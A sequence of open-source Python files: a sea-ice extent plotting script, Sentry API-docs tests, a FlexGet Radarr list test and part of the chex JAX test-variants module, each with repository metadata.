filename = os.path.join(DATA_PATH, url_filename)
with urllib.request.urlopen(url) as response:
with open(filename, 'wb') as out_file:
shutil.copyfileobj(response, out_file)
def prep_data_files():
"""
Prepare and load the data files downloading and updating as necessary.
"""
mkdir_if_necessary(DATA_PATH)
mkdir_if_necessary(OUTPUT_PATH)
if data_files_exist():
print('Data files exist')
sea_ice_indexes = load_data_files()
if data_is_fresh(sea_ice_indexes):
print('Data files are up to date')
else:
print('Data files are outdated')
refresh_data_files()
sea_ice_indexes = load_data_files()
print('Data files have been updated')
else:
print('No data files found')
refresh_data_files()
sea_ice_indexes = load_data_files()
print('Data files have been downloaded')
return sea_ice_indexes
def running_mean(x, N=2):
return np.convolve(x, np.ones((N,))/N)[(N-1):]
def plot(gbl_seaice, column, suptitle, light_style=False, infotext='bottom',
filebase='global_sea_ice', ymin=14, ymax=30, pdf=True, png=True,
legend_loc='lower right'):
"""
Plots graph of a given light_style and creates PDF and PNG outputs.
"""
# Set up foreground background colors based on light_style
if light_style:
FG_COLOR = [0, 0, 0]
BG_COLOR = [1, 1, 1]
else:
FG_COLOR = [1, 1, 1]
BG_COLOR = [0, 0, 0]
now = dt.datetime.now()
cur_mon = str(now.month - 1)
cur_day = str(now.day)
cur_year = str(now.year)
iso_date = dt.date.today().isoformat()
# Get all pre-2010 data grouped by day of year
pre_x = gbl_seaice[(gbl_seaice['Year'] < PRE_YEAR) &
(gbl_seaice['Year'] >= 1978)].groupby(['Day of Year'])
# Calculate average extent for each day of the year in the pre-2010 data
mean = pre_x[column].mean()
sigma = pre_x[column].std()
# Get all the data grouped by each year for plotting
year_groups = gbl_seaice.groupby(['Year'])
# Make plot
plt.rc('savefig', facecolor=BG_COLOR)
plt.rc('axes', edgecolor=FG_COLOR)
plt.rc('xtick', color=FG_COLOR)
plt.rc('ytick', color=FG_COLOR)
plt.rc('axes', labelcolor=FG_COLOR)
plt.rc('axes', facecolor=BG_COLOR)
plt.rc('text', usetex=True)
plt.rc('font', **{'family': 'sans-serif', 'sans-serif': ['Avant Garde']})
# Create figure to plot
fig = plt.figure()
ax = plt.subplot(111)
# Add some extra space at the bottom of the plot
plt.subplots_adjust(bottom=0.14)
ax.tick_params('both', length=7.5, width=2, which='major')
# Adjust spines
spines = ['left', 'bottom']
for loc, spine in ax.spines.items():
if loc in spines:
spine.set_position(('outward', 6))
else:
spine.set_color('none')
if 'left' in spines:
ax.yaxis.set_ticks_position('left')
else:
ax.yaxis.set_ticks([])
if 'bottom' in spines:
ax.xaxis.set_ticks_position('bottom')
else:
ax.xaxis.set_ticks([])
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
gridlines = ax.get_xgridlines() + ax.get_ygridlines()
# Set grid line style
for line in gridlines:
line.set_linestyle('dotted')
line.set_linewidth(0.3)
line.set_color(FG_COLOR)
line.set_alpha(0.2)
line.set_zorder(-5)
minday = np.min(gbl_seaice['Day of Year'])
maxday = np.max(gbl_seaice['Day of Year'])
doy = np.arange(minday, maxday+1)
# import pdb
# pdb.set_trace()
pl = []
def plot_sigma(plt, doy, sigma, n, color=FG_COLOR, alpha=1, lw=0):
"""
Plots the the standard deviations.
"""
label = u'{0}$\sigma$ (pre-{1})'.format(n, PRE_YEAR)
return plt.fill_between(doy, mean+sigma*n, mean-sigma*n,
facecolor=color, alpha=alpha, linewidth=lw,
label=label, zorder=-10)
def mod_color(rgb_color, multiplier=0.15, light_style=light_style):
"""
Takes an RGB color (three float list) and adjusts the colors by the
multiplier values.
"""
hsv_color = c.rgb_to_hsv(rgb_color)
logging.debug('Input color value: {0}'.format(hsv_color[2]))
if light_style:
hsv_color[1] = hsv_color[1] * multiplier
else:
hsv_color[2] = hsv_color[2] * multiplier
logging.debug('Output color value: {0}'.format(hsv_color[2]))
return c.hsv_to_rgb(hsv_color)
pl.append(plot_sigma(plt, doy, sigma, 5,
color=mod_color([1, 0, 0.2], 0.225)))
pl.append(plot_sigma(plt, doy, sigma, 4,
color=mod_color([1, 0, 0.2], 0.125)))
pl.append(plot_sigma(plt, doy, sigma, 3,
color=mod_color([1, 0.7, 0])))
pl.append(plot_sigma(plt, doy, sigma, 2,
color=mod_color([0, 1, 0])))
pl.append(plot_sigma(plt, doy, sigma, 1,
color=BG_COLOR))
# Line width for mean and recent years
lw = 2.5
# Plot mean (with outline of BG_COLOR)
plt.plot(doy, mean, color=BG_COLOR, linewidth=lw+1.5,
zorder=2, linestyle='-')[0]
pl.append(plt.plot(doy, mean, color=FG_COLOR, linewidth=lw,
label='Mean (pre-{0})'.format(PRE_YEAR),
zorder=2, linestyle='-')[0])
# Get count of years of data
year_count = gbl_seaice['Year'].max() - gbl_seaice['Year'].min()
# Number of manually configured years
manual_years = 2
# Set colormap value depending on light/dark
if light_style:
color_map_end = 0.1
else:
color_map_end = 0.35
# Use colormap for each year (avoiding the darkest 35% of magma colors)
color = iter(plt.cm.magma(np.linspace(1, color_map_end,
year_count - manual_years)))
# Plot every year's specific data, some with manually set formatting
for key, grp in year_groups:
if (key >= 1979 and key <= 2018) or key >= 2016:
if key == 2017:
pl.append(plt.plot(grp[column], c='#ff00bb',
zorder=3, linewidth=lw, label=key)[0])
elif key == 2016:
pl.append(plt.plot(grp[column], c='#bb00ff',
zorder=3, linewidth=lw, label=key)[0])
# elif key == 2015:
# pl.append(plt.plot(grp['Total Extent'], c='red',
# zorder=2, linewidth=lw, label=key)[0])
# elif key == 2014:
# pl.append(plt.plot(grp['Total Extent'], c='orange',
# zorder=2, linewidth=lw, label=key)[0])
# elif key == 2013:
# pl.append(plt.plot(grp['Total Extent'], c='yellow',
# zorder=2, linewidth=lw, label=key)[0])
# elif key == 2012:
# pl.append(plt.plot(grp['Total Extent'], c='#00ff00',
# zorder=2, linewidth=lw, label=key)[0])
else:
# Plot all non-manually configured years
plt.plot(grp[column], c=next(color),
zorder=1, linewidth=0.7, alpha=0.5)
# Adjust legend and axes and plot them
le = plt.legend(shadow=False, fontsize=9, loc=legend_loc, fancybox=True,
ncol=2, handles=pl)
for text in le.get_texts():
text.set_color(FG_COLOR)
# Move ylabel a bit to the left for pretty, then plot the label
ax.yaxis.labelpad = 11
plt.ylabel(r'\textbf{Sea Ice Extent [$\times$10$^{6}$ sq. km, '
'%d day rolling avg.]}' % (ROLLING_WINDOW),
fontsize=13)
# Setup x-ticks and plot them
xlabels = calendar.month_abbr[1:13]
xlocations = list(map(lambda x: x+15, np.linspace(1, 366, 13)))
plt.xticks(np.linspace(1, 366, 13))
plt.setp(ax.get_xmajorticklabels(), visible=False)
ax.xaxis.set_minor_locator(ticker.FixedLocator(xlocations))
ax.xaxis.set_minor_formatter(ticker.FixedFormatter(xlabels))
plt.xlim([1, 366])
# Setup y-ticks and plot them
plt.yticks(np.arange(ymin, ymax + 2, 2),
map(str, np.arange(ymin, ymax + 2, 2)), fontsize=13)
plt.ylim([ymin, ymax])
# Adjust ytick label position
for tick in ax.yaxis.get_major_ticks():
tick.set_pad(4)
# Adjust xtick label position
for tick in ax.xaxis.get_minor_ticks():
tick.set_pad(0)
# Add all the misc info text to the figure
def it_annotate(text, infotext, it_offset_num):
it_xpos = 0
it_ypos = 0
it_offset_xbase = 1
it_offset_ybase = 1.25
it_offset_ysep = 7
it_pos_unit = 'axes fraction'
it_textcoords = 'offset points'
if infotext == 'top':
it_ypos = 1
it_offset_ybase = it_offset_ybase * -1 - 5.25
it_offset_ysep = it_offset_ysep * -1
it_xy = (it_xpos, it_ypos)
xytext = (it_offset_xbase, it_offset_ybase +
it_offset_num * it_offset_ysep)
ax.annotate(text,
fontsize=7.0, color=FG_COLOR, xy=it_xy, xytext=xytext,
xycoords=it_pos_unit, textcoords=it_textcoords, ha='left')
it_annotate(r'\textbf{DATA:} NSIDC Sea Ice Index, Version 2 (G02135)',
infotext=infotext, it_offset_num=2)
it_annotate(r'\textbf{CSV:} '
'ftp://sidads.colorado.edu/DATASETS/NOAA/G02135/',
infotext=infotext, it_offset_num=1)
it_annotate(r'\textbf{GRAPHIC:} Emma M (GitHub: @emmatoday)',
infotext=infotext, it_offset_num=0)
ax.annotate(r'(For non-bold years, more recent years are more purple)',
fontsize=9, color=FG_COLOR, backgroundcolor=BG_COLOR,
xy=(0.5, 0.065),
xycoords='figure fraction', ha='center')
ax.annotate(r'Updated %s' % (iso_date),
fontsize=9, color=FG_COLOR, backgroundcolor=BG_COLOR,
xy=(0.5, 0.03),
xycoords='figure fraction', ha='center')
fig.suptitle(suptitle, fontsize=24, color=FG_COLOR, y=0.965)
if light_style:
output_filebase = '{0}_{1}_light'.format(filebase, iso_date)
else:
output_filebase = '{0}_{1}_dark'.format(filebase, iso_date)
if pdf:
pdf_filename = output_filebase + '.pdf'
plt.savefig(os.path.join(OUTPUT_PATH, pdf_filename), dpi=900)
print('\n' 'PDF Figure ({0}) plotted!'.format(pdf_filename))
if png:
png_filename = output_filebase + '.png'
plt.savefig(os.path.join(OUTPUT_PATH, png_filename), dpi=900)
print('\n' 'PNG Figure ({0}) plotted!'.format(png_filename))
def main():
"""
Main function that is called when script is executed from the CLI.
"""
now = dt.datetime.now()
cur_year = str(now.year)
# Prepare and load the data files downloading and updating as necessary
sea_ice_indexes = prep_data_files()
sea_ice_indexes['n'] = sea_ice_indexes['n'][['N Extent', 'Date']]
gbl_seaice = pd.merge(left=sea_ice_indexes['s'],
right=sea_ice_indexes['n'],
on='Date')
gbl_seaice.drop(['Missing', 'Source Data'], axis=1, inplace=True)
# Interpolate to fill in missing data in older years
gbl_seaice.interpolate(inplace=True)
# Add N and S to get global total ice extent
gbl_seaice['Total Extent'] = \
gbl_seaice['S Extent'] + gbl_seaice['N Extent']
# Set the index of the data to be the day of year
gbl_seaice.index = gbl_seaice['Day of Year']
# Set the index type to a a datetime
gbl_seaice.index = gbl_seaice.index.astype(dt.datetime)
n_seaice = gbl_seaice.drop(['Day', 'Date',
'Month', 'Total Extent', 'S Extent'],
axis=1)
s_seaice = gbl_seaice.drop(['Day', 'Date',
'Month', 'Total Extent', 'N Extent'],
axis=1)
# Drop columns we don't need anymore
gbl_seaice.drop(['Day', 'Date',
'Month', 'S Extent', 'N Extent'],
axis=1, inplace=True)
# Set titles
gt = r'\textbf{NSIDC Global Sea Ice Extent (1979-%s)}' % cur_year
nt = r'\textbf{NSIDC Arctic Sea Ice Extent (1979-%s)}' % cur_year
st = r'\textbf{NSIDC Antarctic Sea Ice Extent (1979-%s)}' % cur_year
# Set column names
gc = 'Total Extent'
nc = 'N Extent'
sc = 'S Extent'
# Set filename bases
gf = 'global_sea_ice'
nf = 'arctic_sea_ice'
sf = 'antarctic_sea_ice'
# Plot both the dark and light versions of the graphs
plot(gbl_seaice, column=gc, suptitle=gt, filebase=gf, light_style=True,
png=True, infotext='top')
plot(gbl_seaice, column=gc, suptitle=gt, filebase=gf, light_style=False,
png=True, infotext='top')
plot(n_seaice, column=nc, suptitle=nt, filebase=nf, light_style=True,
png=True, ymin=0, ymax=18, legend_loc='upper right')
plot(n_seaice, column=nc, suptitle=nt, filebase=nf, light_style=False,
png=True, ymin=0, ymax=18, legend_loc='upper right')
plot(s_seaice, column=sc, suptitle=st, filebase=sf, light_style=True,
png=True, ymin=0, ymax=22, infotext='top')
plot(s_seaice, column=sc, suptitle=st, filebase=sf, light_style=False,
png=True, ymin=0, ymax=22, infotext='top')
# Gets CLI arguments and sets up logging to stderr
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-v', '--verbose', action="count", dest="verbose",
default=2,
help="Increase the verbosity. "
"Use twice for extra effect")
parser.add_argument('-q', '--quiet', action="count", dest="quiet",
default=0,
help="Decrease the verbosity. "
"Use twice for extra effect")
args = parser.parse_args()
# Set up clean logging to stderr
log_levels = [logging.CRITICAL, logging.ERROR, logging.WARNING,
logging.INFO, logging.DEBUG]
args.verbose = min(args.verbose - args.quiet, len(log_levels) - 1)
args.verbose = max(args.verbose, 0)
logging.basicConfig(level=log_levels[args.verbose],
format='%(levelname)s: %(message)s')
# Call main function
main()
|
{
"content_hash": "712036302677063026a47b871d77101d",
"timestamp": "",
"source": "github",
"line_count": 571,
"max_line_length": 97,
"avg_line_length": 34.57092819614711,
"alnum_prop": 0.5744174265450861,
"repo_name": "emmatoday/PyClimateGraphs",
"id": "df7e548fad5fe977cd80212b7fa34ba004568ea1",
"size": "19763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SeaIce_Combined.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "490053"
},
{
"name": "Python",
"bytes": "19763"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from django.test.client import RequestFactory
from sentry.testutils.helpers.datetime import iso_format, before_now
from tests.apidocs.util import APIDocsTestCase
class ProjectGroupEventBase(APIDocsTestCase):
def setUp(self):
first_release = {
"firstEvent": before_now(minutes=3),
"lastEvent": before_now(minutes=2, seconds=30),
}
last_release = {
"firstEvent": before_now(minutes=1, seconds=30),
"lastEvent": before_now(minutes=1),
}
for timestamp in first_release.values():
self.create_event("a", release="1.0", timestamp=iso_format(timestamp))
self.create_event("b", release="1.1")
for timestamp in last_release.values():
event = self.create_event("c", release="1.0a", timestamp=iso_format(timestamp))
self.group_id = event.group.id
self.login_as(user=self.user)
class ProjectGroupEventsDocs(ProjectGroupEventBase):
def setUp(self):
super(ProjectGroupEventsDocs, self).setUp()
self.url = u"/api/0/issues/{}/events/".format(self.group_id)
def test_get(self):
response = self.client.get(self.url)
request = RequestFactory().get(self.url)
self.validate_schema(request, response)
class ProjectGroupEventsLatestDocs(ProjectGroupEventBase):
def setUp(self):
super(ProjectGroupEventsLatestDocs, self).setUp()
self.url = u"/api/0/issues/{}/events/latest/".format(self.group_id)
def test_get(self):
response = self.client.get(self.url)
request = RequestFactory().get(self.url)
self.validate_schema(request, response)
class ProjectGroupEventsOldestDocs(ProjectGroupEventBase):
def setUp(self):
super(ProjectGroupEventsOldestDocs, self).setUp()
self.url = u"/api/0/issues/{}/events/oldest/".format(self.group_id)
def test_get(self):
response = self.client.get(self.url)
request = RequestFactory().get(self.url)
self.validate_schema(request, response)
|
{
"content_hash": "e2d2b37c771fd291bbecb0aa7985d6c4",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 91,
"avg_line_length": 32.2,
"alnum_prop": 0.6583850931677019,
"repo_name": "beeftornado/sentry",
"id": "42fad78018cf7f51ee2557737ed20343a0d6f891",
"size": "2118",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/apidocs/endpoints/events/test_group_events.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "157195"
},
{
"name": "HTML",
"bytes": "197026"
},
{
"name": "JavaScript",
"bytes": "380379"
},
{
"name": "Makefile",
"bytes": "2832"
},
{
"name": "Python",
"bytes": "6473603"
}
],
"symlink_target": ""
}
|
import pytest
@pytest.mark.online
class TestRadarrListActions:
config = """
templates:
global:
disable: [seen]
tasks:
clear_and_add_to_radarr_list:
list_clear:
what:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
mock:
- { title: 'Despicable Me 2 (2013)', imdb_id: 'tt1690953', tmdb_id: 93456 }
- { title: 'Sinister 2 (2015)', imdb_id: 'tt2752772', tmdb_id: 283445 }
- { title: 'Crimson Peak (2015)', imdb_id: 'tt2554274', tmdb_id: 201085 }
- { title: 'Deadpool (2016)', imdb_id: 'tt1431045', tmdb_id: 293660 }
accept_all: yes
list_add:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
radarr_list_as_input_plugin:
radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
include_data: True
accept_all: yes
remove_from_radarr_list:
mock:
- { title: "Ocean\'s Twelve (2004)", imdb_id: 'tt0349903', tmdb_id: 163 }
- { title: 'Sinister 2 (2015)', imdb_id: 'tt2752772', tmdb_id: 283445 }
accept_all: yes
list_remove:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
match_radarr_list:
mock:
- { title: 'Despicable.Me.2.2013.1080p.BluRay.x264-FlexGet', imdb_id: 'tt1690953', tmdb_id: 93456 }
- { title: 'Sinister.2.2015.720p.BluRay.x264-FlexGet', imdb_id: 'tt2752772', tmdb_id: 283445 }
- { title: 'Crimson.Peak.2015.720p.BluRay.x264-FlexGet', imdb_id: 'tt2554274', tmdb_id: 201085 }
- { title: 'Deadpool.2016.1080p.BluRay.x264-FlexGet', imdb_id: 'tt1431045', tmdb_id: 293660 }
- { title: 'Kung.Fu.Panda.3.2016.720p.BluRay.x264-FlexGet', imdb_id: 'tt2267968', tmdb_id: 140300 }
list_match:
from:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
"""
# TODO: each action should be own test case
def test_radarr_list_actions(self, execute_task):
# Begin by clearing and then adding a bunch of movies
task = execute_task('clear_and_add_to_radarr_list')
# By using the list as the input we verify that the
# movies added above is returned to us
task = execute_task('radarr_list_as_input_plugin')
assert task.find_entry(
movie_name='Despicable Me 2'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Crimson Peak'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Deadpool'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Sinister 2'
), "movie should have been present in the list but it wasn't"
# Now we will attempt to remove one existing (Sinister 2) and one
# non-existing movie which should not affect anything at all
task = execute_task('remove_from_radarr_list')
# And to verify the list we fetch the list again
# Sinister 2 should now be missing
task = execute_task('radarr_list_as_input_plugin')
assert task.find_entry(
movie_name='Despicable Me 2'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Crimson Peak'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Deadpool'
), "movie should have been present in the list but it wasn't"
assert not task.find_entry(
movie_name='Sinister 2'
), "movie should not be present in the list but it was"
# Now we will try to match a bunch of input entries with
# the list. Two of the movies should not have been matched.
task = execute_task('match_radarr_list')
assert task.find_entry(
'accepted', title='Despicable.Me.2.2013.1080p.BluRay.x264-FlexGet'
), "movie should have been matched but it wasn't"
assert task.find_entry(
'accepted', title='Crimson.Peak.2015.720p.BluRay.x264-FlexGet'
), "movie should have been matched but it wasn't"
assert task.find_entry(
'accepted', title='Deadpool.2016.1080p.BluRay.x264-FlexGet'
), "movie should have been matched but it wasn't"
assert task.find_entry(
'undecided', title='Sinister.2.2015.720p.BluRay.x264-FlexGet'
), "movie should not have been matched but it was"
assert task.find_entry(
'undecided', title='Kung.Fu.Panda.3.2016.720p.BluRay.x264-FlexGet'
), "movie should not have been matched but it was"
# list_match should have removed all the matched movies
# so no movies should remain
task = execute_task('radarr_list_as_input_plugin')
assert len(task.all_entries) == 0, "there should be no movies left in the list"
|
{
"content_hash": "09175d45b4d6c0fdd391f832c987106f",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 113,
"avg_line_length": 44.41732283464567,
"alnum_prop": 0.5708207764580748,
"repo_name": "ianstalk/Flexget",
"id": "4a2ace0890887f711df843afbad5070ef23a0389",
"size": "5641",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "flexget/tests/test_radarr_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2063551"
}
],
"symlink_target": ""
}
|
"""Chex variants utilities."""
import enum
import functools
import inspect
import itertools
from typing import Any, Sequence
import unittest
from absl import flags
from absl.testing import parameterized
from chex._src import fake
from chex._src import pytypes
import jax
from jax import tree_util
import jax.numpy as jnp
import toolz
FLAGS = flags.FLAGS
flags.DEFINE_bool(
"chex_skip_pmap_variant_if_single_device", True,
"Whether to skip pmap variant if only one device is available.")
# We choose to subclass instead of a simple alias, as Python doesn't allow
# multiple inheritance from the same class, and users may want to subclass their
# tests from both `chex.TestCase` and `parameterized.TestCase`.
#
# User is free to use any base class that supports generators unrolling
# instead of `variants.TestCase` or `parameterized.TestCase`. If a base class
# doesn't support this feature variant test fails with a corresponding error.
class TestCase(parameterized.TestCase):
"""A class for Chex tests that use variants.
See the docstring for ``chex.variants`` for more information.
Note: ``chex.variants`` returns a generator producing one test per variant.
Therefore, the used test class must support dynamic unrolling of these
generators during module import. It is implemented (and battle-tested) in
``absl.parameterized.TestCase``, and here we subclass from it.
"""
def variant(self, *args, **kwargs):
"""Raises a RuntimeError if not overriden or redefined."""
raise RuntimeError(
"self.variant is not defined: forgot to wrap a test in @chex.variants?")
class ChexVariantType(enum.Enum):
"""An enumeration of available Chex variants.
Use ``self.variant.type`` to get type of the current test variant.
See the docstring of ``chex.variants`` for more information.
"""
WITH_JIT = 1
WITHOUT_JIT = 2
WITH_DEVICE = 3
WITHOUT_DEVICE = 4
WITH_PMAP = 5
def __str__(self) -> str:
return "_" + self.name.lower()
tree_map = tree_util.tree_map
def params_product(*params_lists: Sequence[Sequence[Any]],
named: bool = False) -> Sequence[Sequence[Any]]:
"""Generates a cartesian product of `params_lists`.
See tests from ``variants_test.py`` for examples of usage.
Args:
*params_lists: A list of params combinations.
named: Whether to generate test names (for
`absl.parameterized.named_parameters(...)`).
Returns:
A cartesian product of `params_lists` combinations.
"""
def generate():
for combination in itertools.product(*params_lists):
if named:
name = "_".join(t[0] for t in combination)
args_tuples = (t[1:] for t in combination)
args = sum(args_tuples, ())
yield (name, *args)
else:
yield sum(combination, ())
return list(generate())
def count_num_calls(fn):
"""Counts the number of times the function was called."""
num_calls = 0
@functools.wraps(fn)
def fn_wrapped(*args, **kwargs):
nonlocal num_calls
num_calls += 1
return fn(*args, **kwargs)
return fn_wrapped, lambda: num_calls
class VariantsTestCaseGenerator:
"""TestCase generator for chex variants. Supports sharding."""
def __init__(self, test_object, which_variants):
self._which_variants = which_variants
self._generated_names_freq = {}
if hasattr(test_object, "__iter__"):
# `test_object` is a generator (e.g. parameterised test).
self._test_methods = list(test_object)
else:
# `test_object` is a single test method.
self._test_methods = [test_object]
def add_variants(self, which_variants):
"""Merge variants."""
for var, incl in which_variants.items():
self._which_variants[var] = self._which_variants.get(var, False) or incl
@property
def __name__(self):
msg = ("A test wrapper attempts to access __name__ of "
"VariantsTestCaseGenerator. Usually, this happens when "
"@parameterized wraps @variants.variants. Make sure that the "
"@variants.variants wrapper is an outer one, i.e. nothing wraps it.")
raise RuntimeError(msg)
def __call__(self):
msg = ("A test wrapper attempts to invoke __call__ of "
"VariantsTestCaseGenerator: make sure that all `TestCase` instances "
"that use variants inherit from `chex.TestCase`.")
raise RuntimeError(msg)
def _set_test_name(self, test_method, variant):
"""Set a name for the generated test."""
name = getattr(test_method, "__name__", "")
params_repr = getattr(test_method, "__x_params_repr__", "")
chex_suffix = f"{variant}"
candidate_name = "_".join(filter(None, [name, params_repr, chex_suffix]))
name_freq = self._generated_names_freq.get(candidate_name, 0)
if name_freq:
# Ensure that test names are unique.
new_name = name + "_" + str(name_freq)
unique_name = "_".join(filter(None, [new_name, params_repr, chex_suffix]))
else:
unique_name = candidate_name
self._generated_names_freq[candidate_name] = name_freq + 1
# Always use name for compatibility with `absl.testing.parameterized`.
setattr(test_method, "__name__", unique_name)
setattr(test_method, "__x_params_repr__", "")
setattr(test_method, "__x_use_name__", True)
return test_method
def _inner_iter(self, test_method):
"""Generate chex variants for a single test."""
def make_test(variant: ChexVariantType):
@functools.wraps(test_method)
def test(self, *args, **kwargs):
# Skip pmap variant if only one device is available.
if (variant is ChexVariantType.WITH_PMAP and
FLAGS["chex_skip_pmap_variant_if_single_device"].value and
jax.device_count() < 2):
raise unittest.SkipTest(
f"Only 1 device is available ({jax.devices()}).")
# n_cpu_devices assert.
if FLAGS["chex_assert_multiple_cpu_devices"].value:
required_n_cpus = fake.get_n_cpu_devices_from_xla_flags()
if required_n_cpus < 2:
raise RuntimeError(
f"Required number of CPU devices is {required_n_cpus} < 2."
"Consider setting up your test module to use multiple CPU "
" devices (see README.md) or disabling "
"`chex_assert_multiple_cpu_devices` flag.")
available_n_cpus = jax.device_count("cpu")
if required_n_cpus != available_n_cpus:
raise RuntimeError(
"Number of available CPU devices is not equal to the required: "
f"{available_n_cpus} != {required_n_cpus}")
# Set up the variant.
self.variant, num_calls = count_num_calls(_variant_decorators[variant])
self.variant.type = variant
res = test_method(self, *args, **kwargs)
if num_calls() == 0:
raise RuntimeError(
"Test is wrapped in @chex.variants, but never calls self.variant."
" Consider debugging the test or removing @chex.variants wrapper."
f" (variant: {variant})")
return res
self._set_test_name(test, variant)
return test
selected_variants = [
var_name for var_name, is_included in self._which_variants.items()
if is_included
]
if not selected_variants:
raise ValueError(f"No variants selected for test: {test_method}.")
return (make_test(var_name) for var_name in selected_variants)
def __iter__(self):
"""Generate chex variants for each test case."""
return itertools.chain(*(self._inner_iter(m) for m in self._test_methods))
@toolz.curry
def _variants_fn(test_object, **which_variants) -> VariantsTestCaseGenerator:
"""Implements `variants` and `all_variants`."""
# Convert keys to enum entries.
which_variants = {
ChexVariantType[name.upper()]: var
for name, var in which_variants.items()
}
if isinstance(test_object, VariantsTestCaseGenerator):
# Merge variants for nested wrappers.
test_object.add_variants(which_variants)
else:
test_object = VariantsTestCaseGenerator(test_object, which_variants)
return test_object
@toolz.curry
# pylint: disable=redefined-outer-name
def variants(test_method,
with_jit: bool = False,
without_jit: bool = False,
with_device: bool = False,
without_device: bool = False,
with_pmap: bool = False) -> VariantsTestCaseGenerator:
# pylint: enable=redefined-outer-name
"""Decorates a test to expose Chex variants.
The decorated test has access to a decorator called ``self.variant``, which
may be applied to functions to test different JAX behaviors. Consider:
.. code-block:: python
@chex.variants(with_jit=True, without_jit=True)
def test(self):
@self.variant
def f(x, y):
return x + y
self.assertEqual(f(1, 2), 3)
In this example, the function ``test`` will be called twice: once with `f`
jitted (i.e. using `jax.jit`) and another where `f` is not jitted.
Variants `with_jit=True` and `with_pmap=True` accept additional specific to
them arguments. Example:
.. code-block:: python
@chex.variants(with_jit=True)
def test(self):
@self.variant(static_argnums=(1,))
def f(x, y):
# `y` is not traced.
return x + y
self.assertEqual(f(1, 2), 3)
Variant `with_pmap=True` also accepts `broadcast_args_to_devices`
(whether to broadcast each input argument to all participating devices),
`reduce_fn` (a function to apply to results of pmapped `fn`), and
`n_devices` (number of devices to use in the `pmap` computation).
See the docstring of `_with_pmap` for more details (including default values).
If used with ``absl.testing.parameterized``, `@chex.variants` must wrap it:
.. code-block:: python
@chex.variants(with_jit=True, without_jit=True)
@parameterized.named_parameters('test', *args)
def test(self, *args):
...
Tests that use this wrapper must be inherited from ``parameterized.TestCase``.
For more examples see ``variants_test.py``.
Args:
test_method: A test method to decorate.
with_jit: Whether to test with `jax.jit`.
without_jit: Whether to test without `jax.jit`. Any jit compilation done
within the test method will not be affected.
with_device: Whether to test with args placed on device, using
`jax.device_put`.
without_device: Whether to test with args (explicitly) not placed on device,
using `jax.device_get`.
with_pmap: Whether to test with `jax.pmap`, with computation duplicated
across devices.
Returns:
A decorated ``test_method``.
"""
return _variants_fn(
test_method,
with_jit=with_jit,
without_jit=without_jit,
with_device=with_device,
without_device=without_device,
with_pmap=with_pmap)
@toolz.curry
# pylint: disable=redefined-outer-name
def all_variants(test_method,
with_jit: bool = True,
without_jit: bool = True,
with_device: bool = True,
without_device: bool = True,
with_pmap: bool = True) -> VariantsTestCaseGenerator:
# pylint: enable=redefined-outer-name
"""Equivalent to ``chex.variants`` but with flipped defaults."""
return _variants_fn(
test_method,
with_jit=with_jit,
without_jit=without_jit,
with_device=with_device,
without_device=without_device,
with_pmap=with_pmap)
def check_variant_arguments(variant_fn):
"""Raises `ValueError` if `variant_fn` got an unknown argument."""
@functools.wraps(variant_fn)
def wrapper(*args, **kwargs):
unknown_args = set(kwargs.keys()) - _valid_kwargs_keys
if unknown_args:
raise ValueError(f"Unknown arguments in `self.variant`: {unknown_args}.")
return variant_fn(*args, **kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _with_jit(fn,
static_argnums=None,
static_argnames=None,
device=None,
backend=None,
**unused_kwargs):
"""Variant that applies `jax.jit` to fn."""
return jax.jit(
fn,
static_argnums=static_argnums,
static_argnames=static_argnames,
device=device,
backend=backend)
@toolz.curry
@check_variant_arguments
def _without_jit(fn, **unused_kwargs):
"""Variant that does not apply `jax.jit` to a fn (identity)."""
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return fn(*args, **kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _with_device(fn, ignore_argnums=(), static_argnums=(), **unused_kwargs):
"""Variant that applies `jax.device_put` to the args of fn."""
if isinstance(ignore_argnums, int):
ignore_argnums = (ignore_argnums,)
if isinstance(static_argnums, int):
static_argnums = (static_argnums,)
@functools.wraps(fn)
def wrapper(*args, **kwargs):
def put(x):
try:
return jax.device_put(x)
except TypeError: # not a valid JAX type
return x
device_args = [
arg if (idx in ignore_argnums or idx in static_argnums) else tree_map(
put, arg) for idx, arg in enumerate(args)
]
device_kwargs = tree_map(put, kwargs)
return fn(*device_args, **device_kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _without_device(fn, **unused_kwargs):
"""Variant that applies `jax.device_get` to the args of fn."""
@functools.wraps(fn)
def wrapper(*args, **kwargs):
def get(x):
if isinstance(x, jax.Array):
return jax.device_get(x)
return x
no_device_args = tree_map(get, args)
no_device_kwargs = tree_map(get, kwargs)
return fn(*no_device_args, **no_device_kwargs)
return wrapper
@toolz.curry
